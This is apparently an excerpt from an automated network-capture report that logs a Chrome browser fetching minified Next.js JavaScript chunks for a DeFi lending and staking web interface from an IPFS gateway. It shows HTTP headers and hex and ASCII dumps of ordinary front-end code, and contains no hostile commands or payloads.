                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 30 2c 63 2e 61 72 72 61 79 69 66 79 29 28 73 29 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 72 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 65 2b 3d 34 2c 72 5b 74 5d 26 26 28 65 2b 3d 36 34 29 3b 61 2e 67 61 73 4c 69 6d 69 74 3d 6e 2e 4f 24 2e 66 72 6f 6d 28 74 2e 67 61 73 29 2e 61 64 64 28 65 29 7d 69 66 28 79 2e 76 61 6c 75 65 29 7b 63 6f 6e 73 74 20 65 3d 6e 2e 4f 24 2e 66 72 6f 6d 28 79 2e 76 61 6c 75 65 29 3b 65 2e 69 73 5a 65 72 6f 28 29 7c 7c 74 2e 70 61 79 61 62 6c 65 7c 7c 70 2e 74 68 72 6f 77 45 72 72 6f 72 28 22 6e 6f 6e 2d 70 61 79 61 62 6c 65 20 6d 65 74 68 6f 64 20 63 61 6e 6e 6f 74 20 6f 76 65 72 72 69 64 65 20 76 61 6c 75 65 22 2c 66 2e 4c 6f 67 67 65 72 2e 65 72 72 6f 72 73 2e 55 4e 53 55 50 50 4f 52 54 45 44 5f 4f 50 45 52 41 54 49 4f 4e 2c
                                                                                                                                                                                                                                                  Data Ascii: (0,c.arrayify)(s);for(let t=0;t<r.length;t++)e+=4,r[t]&&(e+=64);a.gasLimit=n.O$.from(t.gas).add(e)}if(y.value){const e=n.O$.from(y.value);e.isZero()||t.payable||p.throwError("non-payable method cannot override value",f.Logger.errors.UNSUPPORTED_OPERATION,
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 74 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 65 2e 73 69 67 6e 65 72 7c 7c 65 2e 70 72 6f 76 69 64 65 72 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 69 29 7b 72 65 74 75 72 6e 20 64 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 6c 65 74 20 6f 3b 69 66 28 69 2e 6c 65 6e 67 74 68 3d 3d 3d 74 2e 69 6e 70 75 74 73 2e 6c 65 6e 67 74 68 2b 31 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 69 5b 69 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 63 6f 6e 73 74 20 65 3d 28 30 2c 6c 2e 73 68 61 6c 6c 6f 77 43 6f 70 79 29 28 69 2e 70 6f 70 28 29 29 3b 6e 75 6c 6c 21 3d 65 2e 62 6c 6f 63 6b 54 61 67 26 26 28 6f 3d 79 69 65 6c 64 20 65 2e 62 6c 6f 63 6b 54 61 67 29 2c 64 65 6c 65 74 65 20 65 2e 62 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: t,r){const n=e.signer||e.provider;return function(...i){return d(this,void 0,void 0,(function*(){let o;if(i.length===t.inputs.length+1&&"object"===typeof i[i.length-1]){const e=(0,l.shallowCopy)(i.pop());null!=e.blockTag&&(o=yield e.blockTag),delete e.blo


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  76192.168.2.549791209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC504OUTGET /_next/static/chunks/7978-570f194bf991f35f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 12167
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihklklxjia67yzskhqkv6mx7douomv7xrv6fdsmbyojfidcmnyjeq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7978-570f194bf991f35f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihklklxjia67yzskhqkv6mx7douomv7xrv6fdsmbyojfidcmnyjeq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 65 63 63 65 38 34 32 33 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42ecce84231-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 39 37 38 5d 2c 7b 34 31 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 4a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 2c 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 69 3d 72 28 31 32 37 39 29 2c 61 3d 72 28 32 39 36 33 30 29 2c 63 3d 72 28 38 35 38 39 33 29 2c 73 3d 5b 22 76 61 6c 75 65 22 2c 22 73 79 6d 62 6f 6c 22 2c 22 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 22 2c 22 63 6f 6d 70 61
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7978],{41024:function(e,t,r){r.d(t,{J:function(){return p},B:function(){return b}});var n=r(59499),o=r(4730),i=r(1279),a=r(29630),c=r(85893),s=["value","symbol","visibleDecimals","compa
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 53 22 2c 7b 6d 61 78 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 2c 6d 69 6e 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 7d 29 2e 66 6f 72 6d 61 74 28 70 29 2c 70 6f 73 74 66 69 78 3a 75 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 2c 6e 3d 65 2e 72 6f 75 6e 64 44 6f 77 6e 2c 6f 3d 70 28 7b 76 61 6c 75 65 3a 74 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 72 2c 72 6f 75 6e 64 44 6f 77 6e 3a 6e 7d 29 2c 69 3d 6f 2e 70 72 65 66 69 78 2c 61 3d 6f 2e 70 6f 73 74 66 69 78 3b 72 65 74 75 72 6e 28 30 2c 63 2e 6a 73 78 73 29 28 63 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 69 2c 61 5d 7d 29 7d 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: S",{maximumFractionDigits:n,minimumFractionDigits:n}).format(p),postfix:u}};function f(e){var t=e.value,r=e.visibleDecimals,n=e.roundDown,o=p({value:t,visibleDecimals:r,roundDown:n}),i=o.prefix,a=o.postfix;return(0,c.jsxs)(c.Fragment,{children:[i,a]})}fun
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 22 75 73 64 22 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 72 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 72 26 26 28 30 2c 63 2e 6a 73 78 29 28 61 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 6c 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 76 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 70 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 29 5d 7d 29 29 7d 7d 2c 39 32 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39
                                                                                                                                                                                                                                                  Data Ascii: "usd"!==(null===r||void 0===r?void 0:r.toLowerCase())&&"undefined"!==typeof r&&(0,c.jsx)(a.Z,{component:"span",sx:{ml:.5},variant:d||v.variant,color:p||"text.secondary",children:r})]}))}},92391:function(e,t,r){r.d(t,{X:function(){return d}});var n=r(59499
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 7d 2c 54 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 38 33 36 31 38 29 2c 6f 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 37 33 30 29 2c 61 3d 72 28 38 39 37 32 32 29 2c 63 3d 72 28 33 30 31 32 30 29 2c 73 3d 72 28 36 30 30 38 32 29 2c 6c 3d 72 28 36 37 32 39 34 29 2c 75 3d 72 28 32 35 30 34 33 29 2c 64 3d 72 28 38 35 38 39 33 29 2c 70 3d 5b 22 73 79 6d 62 6f 6c 22 2c 22 61 54 6f 6b 65 6e 22 5d 2c 66 3d 5b 22 73 79 6d 62 6f 6c 22 2c 22 6c 6f 67 6f 55 52 49 22 5d 2c 62 3d 5b 22 73 79 6d 62 6f 6c 73 22 2c 22 62 61 64 67 65 53 79 6d 62 6f 6c 22 5d 2c 6d 3d 5b 22 73 79 6d 62 6f 6c 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65
                                                                                                                                                                                                                                                  Data Ascii: on(){return j},T1:function(){return w}});var n=r(83618),o=r(59499),i=r(4730),a=r(89722),c=r(30120),s=r(60082),l=r(67294),u=r(25043),d=r(85893),p=["symbol","aToken"],f=["symbol","logoURI"],b=["symbols","badgeSymbol"],m=["symbol"];function v(e,t){var r=Obje
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 74 65 28 22 68 65 69 67 68 74 22 2c 32 30 36 29 2c 66 7c 7c 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 69 65 77 42 6f 78 22 2c 22 30 20 30 20 22 2e 63 6f 6e 63 61 74 28 64 2c 22 20 22 29 2e 63 6f 6e 63 61 74 28 70 29 29 2c 6e 75 6c 6c 3d 3d 3d 28 6c 3d 69 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 7c 7c 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 75 29 3b 76 61 72 20 62 3d 28 6e 65 77 20 58 4d 4c 53 65 72 69 61 6c 69 7a 65 72 29 2e 73 65 72 69 61 6c 69 7a 65 54 6f 53 74 72 69 6e 67 28 69 2e 63 75 72 72 65 6e 74 29 3b 72 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70
                                                                                                                                                                                                                                                  Data Ascii: te("height",206),f||u.setAttribute("viewBox","0 0 ".concat(d," ").concat(p)),null===(l=i.current)||void 0===l||l.appendChild(u);var b=(new XMLSerializer).serializeToString(i.current);r("data:image/svg+xml;base64,".concat(window.btoa(unescape(encodeURIComp
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 7b 69 64 3a 22 47 72 6f 75 70 5f 32 39 31 30 39 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 69 64 3a 22 53 75 62 74 72 61 63 74 69 6f 6e 5f 31 30 38 22 2c 66 69 6c 6c 3a 22 75 72 6c 28 23 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 29 22 2c 64 3a 22 4d 31 32 38 20 32 35 36 61 31 32 38 2e 39 37 36 20 31 32 38 2e 39 37 36 20 30 20 30 20 31 2d 32 35 2e 38 2d 32 2e 36 20 31 32 37 2e 33 30 39 20 31 32 37 2e 33 30 39 20 30 20 30 20 31 2d 34 35 2e 37 37 2d 31 39 2e 32 36 31 20 31 32 38 2e 33 36 36 20 31 32 38 2e 33 36 36 20 30 20 30 20 31 2d 34 36 2e 33 37 35 2d 35 36 2e 33 31 35 41 31 32 37 2e 33 35 37 20 31 32 37 2e 33 35 37 20 30 20 30 20 31 20 32 2e 36 20 31 35 33 2e 38 61 31 32 39 2e 32 35 31 20 31 32 39 2e 32
                                                                                                                                                                                                                                                  Data Ascii: {id:"Group_29109",children:[(0,d.jsx)("path",{id:"Subtraction_108",fill:"url(#linear-gradient)",d:"M128 256a128.976 128.976 0 0 1-25.8-2.6 127.309 127.309 0 0 1-45.77-19.261 128.366 128.366 0 0 1-46.375-56.315A127.357 127.357 0 0 1 2.6 153.8a129.251 129.2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6f 6e 20 78 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 79 6d 62 6f 6c 2c 72 3d 65 2e 61 54 6f 6b 65 6e 2c 6e 3d 28 30 2c 69 2e 5a 29 28 65 2c 70 29 2c 6f 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65 29 28 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 2c 63 3d 6f 5b 30 5d 2c 73 3d 6f 5b 31 5d 3b 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 29 28 61 2e 5a 2c 79 28 79 28 7b 7d 2c 6e 29 2c 7b 7d 2c 7b 73 78 3a 79 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 35 30 25 22 7d 2c 6e 2e 73 78 29 2c 63 68 69 6c 64 72 65 6e 3a 72 3f 28 30 2c 64 2e 6a 73 78 29 28 67 2c 7b 73 79 6d 62 6f 6c 3a 63 7d 29 3a 28 30 2c 64 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 22
                                                                                                                                                                                                                                                  Data Ascii: on x(e){var t=e.symbol,r=e.aToken,n=(0,i.Z)(e,p),o=(0,l.useState)(t.toLowerCase()),c=o[0],s=o[1];return(0,d.jsx)(a.Z,y(y({},n),{},{sx:y({display:"flex",position:"relative",borderRadius:"50%"},n.sx),children:r?(0,d.jsx)(g,{symbol:c}):(0,d.jsx)("img",{src:"
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6c 2c 72 3d 28 30 2c 69 2e 5a 29 28 65 2c 6d 29 2c 6f 3d 74 2e 73 70 6c 69 74 28 22 5f 22 29 3b 69 66 28 6f 2e 6c 65 6e 67 74 68 3e 31 29 7b 76 61 72 20 61 3d 28 30 2c 6e 2e 5a 29 28 6f 29 2c 63 3d 61 5b 30 5d 2c 73 3d 61 2e 73 6c 69 63 65 28 31 29 3b 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 29 28 4f 2c 79 28 79 28 7b 7d 2c 72 29 2c 7b 7d 2c 7b 73 79 6d 62 6f 6c 73 3a 73 2c 62 61 64 67 65 53 79 6d 62 6f 6c 3a 22 2f 70 6f 6f 6c 73 2f 22 2b 63 7d 29 29 7d 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 29 28 78 2c 79 28 7b 73 79 6d 62 6f 6c 3a 74 7d 2c 72 29 29 7d 67 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 41 54 6f 6b 65 6e 49 63 6f 6e 22 7d 2c 38 38 37 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 54 38 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: l,r=(0,i.Z)(e,m),o=t.split("_");if(o.length>1){var a=(0,n.Z)(o),c=a[0],s=a.slice(1);return(0,d.jsx)(O,y(y({},r),{},{symbols:s,badgeSymbol:"/pools/"+c}))}return(0,d.jsx)(x,y({symbol:t},r))}g.displayName="ATokenIcon"},88793:function(e,t,r){r.d(t,{T8:functio
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1280INData Raw: 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 28 30 2c 6c 2e 7a 29 28 29 2e 75 69 53 74 61 6b 65 44 61 74 61 53 65 72 76 69 63 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 61 29 28 7b 71 75 65 72 79 46 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 67 65 74 47 65 6e 65 72 61 6c 53 74 61 6b 65 55 49 44 61 74 61 48 75 6d 61 6e 69 7a 65 64 28 65 2c 75 2e 54 38 2c 75 2e 5a 35 29 7d 2c 71 75 65 72 79 4b 65 79 3a 73 2e 42 2e 67 65 6e 65 72 61 6c 53 74 61 6b 65 55 69 44 61 74 61 28 65 2c 75 2e 54 38 2c 75 2e 5a 35 29 2c 72 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 3a 73 2e 67 2c 73 65 6c 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                  Data Ascii: yDescriptor(r,t))}))}return e}var f=function(e,t){var r=(0,l.z)().uiStakeDataService;return(0,i.a)({queryFn:function(){return r.getGeneralStakeUIDataHumanized(e,u.T8,u.Z5)},queryKey:s.B.generalStakeUiData(e,u.T8,u.Z5),refetchInterval:s.g,select:function(e


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  77192.168.2.549793209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC746OUTGET /_next/static/chunks/pages/index-5c55ce06141b7657.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 117965
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihe6icljtcnqoqnmqwekoq2mlhsmnb3eg4n3m25eup2i75dflb3cu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/index-5c55ce06141b7657.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreihe6icljtcnqoqnmqwekoq2mlhsmnb3eg4n3m25eup2i75dflb3cu
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC139INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 6e 79 35 2d 30 34 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 31 33 30 32 38 34 38 30 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 66 30 64 34 65 63 33 35 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-ny5-04CF-Cache-Status: HITAge: 13028480Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42f0d4ec359-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 30 35 5d 2c 7b 35 36 36 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 6e 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 34 39 35 30 31 29 2c 6f 3d 72 28 33 30 31 32 30 29 2c 61 3d 72 28 32 39 36 33 30 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 73 3d 72 28 33 34 36 33 37 29 2c 6c 3d 72 28 35 39 33 37 39 29 2c 63 3d 72 28 34 36 39 33 30 29 2c 64 3d 72 28 37 38 33 37 31 29 2c 75 3d 72 28 34 35 37 34 35 29 2c 70 3d 72 28 31 35 34
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{56687:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return wn}});var n=r(49501),o=r(30120),a=r(29630),i=r(67294),s=r(34637),l=r(59379),c=r(46930),d=r(78371),u=r(45745),p=r(154
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 73 74 61 62 6c 65 42 6f 72 72 6f 77 41 50 59 29 7d 29 29 2c 72 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 2d 74 5b 65 5d 7d 29 29 29 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 3f 22 70 6f 73 69 74 69 6f 6e 22 3d 3d 3d 74 3f 72 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 73 65 72 76 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3c 74 2e 72 65 73 65 72 76 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3f 2d 31 3a 31 7d 29 29 3a 72 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 73 79 6d 62 6f 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28
